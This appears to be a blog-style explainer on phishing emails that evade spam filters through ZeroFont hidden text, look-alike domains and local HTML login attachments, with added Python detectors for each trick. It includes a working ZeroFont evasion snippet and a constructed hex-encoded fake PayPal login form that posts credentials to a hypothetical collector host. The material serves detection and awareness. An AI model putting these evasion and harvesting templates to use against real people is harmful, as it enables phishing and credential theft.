The Holy Grail for anyone sending phishing emails is getting into the recipient's inbox. Once there, the recipient (aka potential victim) will at least have to look at their creation before sending it on its way to the spam folder. And maybe, just maybe, an interesting subject line will get the email opened. Then the greatest of all miracles has a chance to take place: the recipient may want to look at an attached document and, with a few extra moves on the recipient's part, the document will be opened and malware installed on the recipient's (now victim's) computer. There are companies whose sole claim is the ability to get a company's email advertisement (aka spam) into a lucky recipient's inbox, so the importance of reaching the inbox cannot be overstated.
Keep in mind that when an email arrives it is automatically analyzed by a spam-detecting algorithm (a spam filter). Spam filters look for certain giveaways. For example, they check whether the email really comes from whom it claims to come from. If the company name in the footer has no connection to the sender's email address, the email is directed to the spam folder.
Microsoft's natural language processing goes further. It analyzes the text of the email and tries to determine what the writers are up to. In other words, the language-processing algorithm tries to determine whether the email is some sort of scam. Does it, for example, ask the recipient to give up personal information or open a suspicious document? If so, the email is sent to the spam folder, perhaps with an accompanying warning. Enter ZeroFont.
Imagine if a criminal could make the language processor read a different message from the one the recipient sees. That's what the ZeroFont ploy does. Here's an example from the Avanan website.
The ZeroFont ploy confuses the spam filter by inserting text whose font size is set to zero. This was apparently an old technique that most filters were already programmed to look for, but not the new Microsoft natural language processor.
In other words, the recipient thinks he or she received a valid email from a valid company. What makes it seem even more valid is that the spam filter didn’t detect anything wrong with it and put it into the inbox. So, if the email has an attachment, such as an invoice, the chances of the recipient opening it are greatly increased.
Here is how the code works. The phisher wraps extra text in a span whose font size is set to zero. The recipient's mail client renders nothing for that span, so the recipient sees only the surrounding text, while a spam filter that reads the raw text sees the hidden and visible text run together. If you copy and paste the code below into an HTML testing site like the Tryit Editor and push "Run", you will see what the email recipient sees.
<h1>HE<span style="FONT-SIZE: 0px">This is how you hide text with the ZeroFont technique </span>LLO</h1>
<p>I am sending you this phishing email <span style="FONT-SIZE: 0px">I can put any nonsense here that will confuse the spam filter </span>to trick you into doing something stupid.</p>
If you do this, you will see the following (the heading reads as one word because the hidden span takes up no space).
HELLO
I am sending you this phishing email to trick you into doing something stupid.
The spam filter, however, sees it like this.
HE this is how you hide text with the ZeroFont technique LLO
I am sending you this phishing email I can put any nonsense here that will confuse the spam filter to trick you into doing something stupid.
In an actual scenario, scammers made the recipient see the following email.
Of course, the spam filter saw this message obscured by nonsense words.
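To make the two views concrete, here is an added example (not code from the original post or from Avanan) that parses an HTML message with Python's standard-library HTMLParser and splits it into what the recipient sees and what a text-only filter reads. It assumes the hiding is done with an inline style, as in the sample above; `<style>` blocks and other hiding tricks such as `display: none` or matching text and background colours are not handled. The sample message is the one from this page, with straight quotes.

```python
"""Recover both views of a ZeroFont email: what the recipient sees and what a
text-only spam filter reads.  Added example, not code from the original post."""
import re
from html.parser import HTMLParser

# Matches inline styles that render text at zero size: "font-size: 0", "0px",
# "0pt", "0.0em" ...  Assumption: only inline styles are used, which is what
# the ZeroFont sample on this page does; <style> blocks are not resolved.
ZERO_SIZE = re.compile(
    r"font-size\s*:\s*0+(?:\.0+)?\s*(?:px|pt|em|rem|%)?\s*(?:;|$)", re.I)

# Elements that never have a closing tag, so they must not touch the stack.
VOID_TAGS = {"br", "img", "hr", "meta", "link", "input", "area", "base", "col"}


class ZeroFontParser(HTMLParser):
    """Collect text runs, tagging each as visible or hidden by a zero font size."""

    def __init__(self):
        super().__init__()
        self.visible, self.hidden, self.everything = [], [], []
        self._stack = []        # one bool per open element: hidden or not
        self._hidden_depth = 0  # > 0 while inside any zero-size element

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        style = dict(attrs).get("style") or ""
        hidden = bool(ZERO_SIZE.search(style))
        self._stack.append(hidden)
        self._hidden_depth += hidden

    def handle_startendtag(self, tag, attrs):
        pass  # <br/>-style self-closing tags contain no text: nothing to track

    def handle_endtag(self, tag):
        if tag in VOID_TAGS or not self._stack:
            return
        self._hidden_depth -= self._stack.pop()

    def handle_data(self, data):
        self.everything.append(data)
        (self.hidden if self._hidden_depth else self.visible).append(data)


def _squash(parts):
    return re.sub(r"\s+", " ", "".join(parts)).strip()


def split_views(html_body):
    """Return the recipient's view, the filter's view, and the hidden text alone."""
    p = ZeroFontParser()
    p.feed(html_body)
    p.close()
    return {
        "recipient_sees": _squash(p.visible),
        "filter_sees": _squash(p.everything),
        "hidden": _squash(p.hidden),
    }


def is_zerofont(html_body, min_hidden_chars=8):
    """Flag a message whose zero-size text is long enough to sway a text classifier."""
    return len(split_views(html_body)["hidden"]) >= min_hidden_chars


# The sample from this page, with straight quotes (constructed test input).
SAMPLE = (
    '<h1>HE<span style="FONT-SIZE: 0px">This is how you hide text with the '
    'ZeroFont technique </span>LLO</h1>\n'
    '<p>I am sending you this phishing email <span style="FONT-SIZE: 0px">'
    'I can put any nonsense here that will confuse the spam filter </span>'
    'to trick you into doing something stupid.</p>'
)

if __name__ == "__main__":
    views = split_views(SAMPLE)
    print("recipient sees:", views["recipient_sees"])
    print("filter sees:   ", views["filter_sees"])
    print("ZeroFont?      ", is_zerofont(SAMPLE))
```

The point of keeping the three views apart is that a filter should classify the recipient's view, and treat a large gap between that view and the raw text as a signal in its own right; a filter that only scores the raw text is exactly what this trick is built to fool.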
But ZeroFont is not the only invisibility trick in use. Another trick confuses the spam filter by using non-ASCII characters that look like ASCII characters (a so-called homograph attack). The link below seems valid, even if you hover over it in some applications. It will, apparently, fool the Microsoft filter.
If you follow the link you’ll get to a page that looks like this.
The trick is that the 'l' in 'apple' isn't really an 'l' but a look-alike character; in many fonts a capital 'I', or a letter from another alphabet such as Cyrillic, is drawn the same way as a lowercase 'l'. In some fonts the substitution is more obvious, and the link will look something like this: appIe.com. The fake link is harmless in this case, but it could easily have led you to a fake login page or a page that installs malware.
I tested this fake link in both Yahoo and Gmail. Gmail detects an email with the link as spam and even gives this warning.
However, Yahoo allowed the email into my inbox.
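The check a mail filter (or a cautious reader) can run on such a link is shown below as an added example, not code from the original post or from any mail provider. It reduces a host name to the ASCII string a human would read it as, using a small hand-picked table of look-alike characters (the real Unicode confusables list is much larger; this subset is an assumption made for illustration), reports labels that mix alphabets, shows the Punycode form the resolver actually looks up, and compares the result against a short list of protected brands, which is also an assumption.

```python
"""Spot look-alike (homograph) domains such as appIe.com or a Cyrillic apple.com.
Added example, not from the original post; the confusable table is a small
hand-picked subset, not the full Unicode confusables.txt."""
import unicodedata

# Characters commonly swapped for ASCII letters.  The capital I and digit 1
# are the pure-ASCII cases; the rest are Cyrillic and Greek look-alikes.
CONFUSABLE = {
    "I": "l", "1": "l", "|": "l", "0": "o",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",   # Cyrillic а е о р
    "\u0441": "c", "\u0445": "x", "\u0443": "y", "\u0456": "i",   # Cyrillic с х у і
    "\u04cf": "l",                                                # Cyrillic palochka
    "\u03bf": "o", "\u03b1": "a", "\u03bd": "v",                  # Greek ο α ν
}
CONFUSABLE_PAIRS = {"rn": "m", "vv": "w"}   # two letters that read as one

# Brands worth protecting.  Assumption: a real deployment loads its own list.
PROTECTED = ("apple.com", "paypal.com", "microsoft.com")


def skeleton(name):
    """Map a host name to the ASCII string a human would read it as."""
    out = []
    for ch in name:
        ch = CONFUSABLE.get(ch, ch)
        # drop accents: 'é' -> 'e' via compatibility decomposition
        ch = "".join(c for c in unicodedata.normalize("NFKD", ch)
                     if not unicodedata.combining(c))
        out.append(ch.lower())
    s = "".join(out)
    for pair, single in CONFUSABLE_PAIRS.items():
        s = s.replace(pair, single)
    return s


def scripts_in(label):
    """Unicode scripts (LATIN, CYRILLIC, ...) of the letters in one DNS label."""
    return {unicodedata.name(c, "UNKNOWN").split()[0] for c in label if c.isalpha()}


def check_domain(domain, protected=PROTECTED):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    host = domain.strip().rstrip(".")
    for label in host.split("."):
        used = scripts_in(label)
        if len(used) > 1:
            findings.append(f"mixed scripts in {label!r}: {sorted(used)}")
    if not host.isascii():
        # What the resolver actually looks up: the Punycode (xn--) form.
        try:
            findings.append("punycode form " + host.encode("idna").decode("ascii"))
        except UnicodeError as exc:
            findings.append(f"IDNA encoding failed: {exc}")
    sk = skeleton(host)
    for brand in protected:
        if sk == skeleton(brand) and host.lower() != brand:
            findings.append(f"looks like {brand}")
    return findings


if __name__ == "__main__":
    for d in ("apple.com", "appIe.com", "\u0430pple.com", "paypa1.com"):
        print(d, "->", check_domain(d) or "ok")
```

Note that the capital-I case passes every Unicode check (it is plain ASCII and a single script), so the brand comparison is the only thing that catches it; conversely the Cyrillic case is caught three times over, which is why mail clients that display the xn-- form of a link give the reader a fighting chance.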
The last invisibility trick that is making the rounds and fooling spam filters is an email that includes a link that's not a link at all. The so-called link is actually an attachment, and clicking it opens an HTML file that looks like a real login page. Here is an example.
If you got a well-designed email that seems to be from PayPal telling you to follow a link, you may end up on what seems to be a valid login page. Of course, you would have to ignore the "file://" at the beginning of the address, which shows that the page was opened from your own disk rather than from PayPal's servers. Filling in the information and clicking "Submit" will post what you typed to the hacker's server.
The email and its attached file escape detection by encoding any links with hexadecimal escape characters, so the links are obscured from filters that scan for URLs. Since the attachment doesn't navigate to another site but opens locally, it is not detected as malicious, even though it is an HTML document that submits whatever you enter to a site the hacker controls.
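What a scanner has to do with such an attachment is undo the encoding before looking for links. The following is an added example, not code from the original post or from any vendor: it peels HTML entities, JavaScript \xNN and \uNNNN escapes and percent-encoding, repeating until nothing changes, then reports which URLs only appear after decoding, where the form posts to, and whether the page asks for a password. The attachment is constructed here for the example, and the login-verify.example host names are hypothetical.

```python
"""Pull the real destinations out of an HTML login-page attachment whose URLs
are hidden behind hex escapes.  Added example, not from the original post; the
attachment below is constructed and the .example host names are hypothetical."""
import html
import re
from urllib.parse import unquote

JS_HEX = re.compile(r"\\x([0-9a-fA-F]{2})")      # "\x68" -> "h"
JS_UNI = re.compile(r"\\u([0-9a-fA-F]{4})")      # "\u0068" -> "h"
URL = re.compile(r"https?://[^\s\"'<>]+", re.I)
FORM_ACTION = re.compile(r"<form[^>]*\baction\s*=\s*[\"']?([^\"'\s>]+)", re.I)
PASSWORD_FIELD = re.compile(r"<input[^>]*type\s*=\s*[\"']?password", re.I)


def deobfuscate(text):
    """Peel HTML entities, JavaScript hex/unicode escapes and percent-encoding,
    repeating until nothing changes, because the layers are often stacked."""
    previous = None
    while previous != text:
        previous = text
        text = html.unescape(text)
        text = JS_HEX.sub(lambda m: chr(int(m.group(1), 16)), text)
        text = JS_UNI.sub(lambda m: chr(int(m.group(1), 16)), text)
        text = unquote(text)
    return text


def extract_targets(attachment):
    """Compare URLs visible in the raw file with those that appear after decoding."""
    visible = set(URL.findall(attachment))
    decoded = deobfuscate(attachment)
    all_urls = set(URL.findall(decoded))
    return {
        "visible_urls": visible,
        "hidden_urls": all_urls - visible,
        "form_actions": set(FORM_ACTION.findall(decoded)),
        "credential_form": bool(PASSWORD_FIELD.search(decoded)),
    }


# --- constructed sample attachment ---------------------------------------
COLLECTOR = "https://login-verify.example/collect.php"     # hypothetical
FALLBACK = "https://login-verify.example/redirect"         # hypothetical


def html_hex(s):
    """Encode every character as an HTML hex entity: "h" -> "&#x68;"."""
    return "".join(f"&#x{ord(c):x};" for c in s)


def js_hex(s):
    """Encode every character as a JavaScript hex escape: "h" -> "\\x68"."""
    return "".join(f"\\x{ord(c):02x}" for c in s)


SAMPLE_ATTACHMENT = f"""<html><body>
<h2>PayPal - confirm your account</h2>
<form id="f" method="post" action="{html_hex(COLLECTOR)}">
  <input name="email"> <input name="password" type="password">
  <input type="submit" value="Submit">
</form>
<script>
  var fallback = "{js_hex(FALLBACK)}";   // used if the form post fails
</script>
</body></html>"""

if __name__ == "__main__":
    result = extract_targets(SAMPLE_ATTACHMENT)
    print("URLs visible to a naive scanner:", sorted(result["visible_urls"]))
    print("URLs found after decoding:      ", sorted(result["hidden_urls"]))
    print("form posts to:                  ", sorted(result["form_actions"]))
    print("asks for a password:            ", result["credential_form"])
```

A grep for "http" over the raw attachment finds nothing, which is the whole point of the encoding; after decoding, both destinations and the password field are in plain view, and the combination of a password field with a form that posts off-disk is what a scanner should treat as a credential-harvesting page regardless of how the file was opened.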
All of this means you need to be careful about any unsolicited email that reaches your inbox. Normal precautions should stop most of these attempts from succeeding. Always check every link, and check the address of any page you have been led to. And remember, what you don't see can hurt you.